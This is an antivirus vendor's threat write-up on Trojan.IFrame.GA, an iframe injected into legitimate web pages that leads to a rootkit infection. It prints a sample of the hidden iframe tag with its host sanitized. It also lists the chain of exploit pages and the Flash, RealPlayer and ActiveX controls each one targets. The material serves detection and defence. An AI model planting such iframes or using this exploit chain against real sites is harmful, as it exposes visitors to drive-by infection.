Trojan.IFrame.GA

SYMPTOMS:

It currently leads to a Rootkit.Agent.AIWN infection.

TECHNICAL DESCRIPTION:

Detects a type of malicious iframes injected in legit webpages.
The iframe tag looks like:

<iframe src=http://sanitized/fxx.htm width=100 height=0>


I'll base this description on a valid site(many of them were sanitized or taken down): hxxp://www.*******.cn/a114/fxx.htm (please don't access that page in your browser unless you know what you're doing.)

The fxx.htm page which only contains a SCRIPT tag and here the fun begins(with many iframes injected in page):
* fx.htm - this one tries to exploit a vulnerability in FlashPlayer
* ../a1/ss.htm
* ../a1/MS06014.htm
* ../a1/sina.htm - if Sina Downloader.DLoader.1 Activex Control is available
* ../a1/no.htm - if UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control is available
* ../a1/bfyy.htm - if MPS.StormPlayer ActiveX Control is available
* ../a1/GLWORLD.html - for GLIEDown.IEDown.1
* ../a1/real.htm - for RealPlayer IERPCtl.IERPCtl.1 if RealPlayer's version is older than 6.0.14.552 (or it)
* ../a1/real.hTml - if RealPlayer's version is newer than 6.0.14.552



fx.htm is detected as Trojan.Exploit.ANPI and, depending on browser, leads to a Trojan.Exploit.SSX for browser which have "msie" in their User-Agent, respectively Trojan.JS.Redirector.E for the rest of browsers. This leads eventually to some flash files detected as Exploit.SWF.Gen.

Removal instructions:

Please let BitDefender disinfect your files.

ANALYZED BY:

Alexandru Maximciuc, virus researcher